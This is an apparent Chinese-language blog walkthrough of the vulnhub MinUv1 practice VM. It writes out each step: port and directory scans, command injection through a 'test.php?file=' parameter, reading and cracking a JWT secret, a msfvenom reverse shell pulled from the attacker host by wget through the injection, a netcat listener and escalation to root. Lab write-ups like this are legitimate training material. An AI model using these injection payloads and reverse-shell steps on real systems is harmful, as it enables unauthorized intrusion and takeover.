本周实践的是vulnhub的MinUv1镜像,
下载地址,https://download.vulnhub.com/minu/MinUv1.ova.7z,
用virtualbox导入成功,
console上能直接看到地址192.168.0.187,
对靶机做端口扫描sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,
获取到靶机开放了80端口的http服务,
对http服务进行php文件路径扫描,
dirb http://192.168.0.187/ -X .php,
获取到http://192.168.0.187/test.php,
浏览器访问http://192.168.0.187/test.php,点击页面超链接,
获取到有文件包含漏洞的路径,
浏览器访问http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+ls /home,获取到home下的bob目录,
查看bob目录下的文件,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+ls -la /home/bob,获取到._pw_
查看._pw_的文件内容,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+cat /home/bob/._pw_,
获取到jwt加密的字符串,下载破解软件,
git clone https://github.com/brendan-rius/c-jwt-cracker.git,
cd c-jwt-cracker,sudo apt update,
sudo apt-get install libssl-dev,make,
破解,./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg,
获取到密码mlnV1,
在kali攻击机上制作反弹shell程序,
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.0.191 lport=4444 -f elf > shell,
kali攻击机开启http下载服务,python2 -m SimpleHTTPServer,
浏览器执行,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+wget+-O+/tmp/shell+http://192.168.0.191:8000/shell,
浏览器执行http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+chmod 777 /tmp/shell,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器执行http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+/tmp/shell,
kali攻击机上获取到反弹shell,转成交互式shell,
SHELL=/bin/bash script -q /dev/null,
切换到root,用上面获取到的密码,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之MinUv1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论